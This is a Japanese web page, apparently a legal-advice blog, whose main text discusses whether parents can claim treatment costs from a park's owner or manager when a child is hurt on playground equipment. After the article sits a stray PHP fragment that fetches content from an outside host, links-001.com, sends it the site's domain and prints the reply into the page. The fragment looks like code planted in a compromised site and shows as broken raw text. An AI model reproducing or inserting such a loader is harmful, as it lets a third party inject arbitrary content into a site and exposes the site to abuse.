前へ
次へ

道路交通法に基づく道路標識の分類と目的

車道や歩道には、道路交通法に基づく道路標識が数々設置されています。
全て同列に見える道路標識も

more

夫の厚生年金を妻が受け取れるケース

基本的には20歳になると国民年金に加入することになり、その後60歳まで保険料を支払わなければいけませ

more

入学金と授業料を支払って入学を辞退したとき

どうしても大学に入学したいとき、本命の大学の他に滑り止め大学も受験することがあるでしょう。

more

公園の遊具を利用していてけがをしたときの治療費

最近の子供は公園よりも自宅でゲームなどをすることが多くなっているのかもしれません。
でも近所に公園があるときは遊びに行くこともあるでしょう。
公園には定番の遊具からその公園にしかないような珍しい遊具など様々な設備が設置されています。
使い方を守って利用する必要があるでしょう。
あるとき子供が公園から泣きながら帰ってきて、話を聞くと遊具で遊んでいるときにけがをしたとのことでした。
このとき子のケガの治療費は自分で払う必要があるか、公園の所有者などに請求する必要があるかです。
まずどんなケガをしたのか、なぜけがをしたのかなどを子供から聞く必要があるでしょう。
子どもによっては遊具の使い方を間違うことがあり、それが原因でけがをしたときには所有者などに請求できないときもあります。
一方遊具を正しく使っていたのに破損によってけがをしたなら遊具に責任があると言えるでしょう。
所有者であったり管理者に請求ができるので、証拠の写真などを撮っておくと良いかも知れません。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top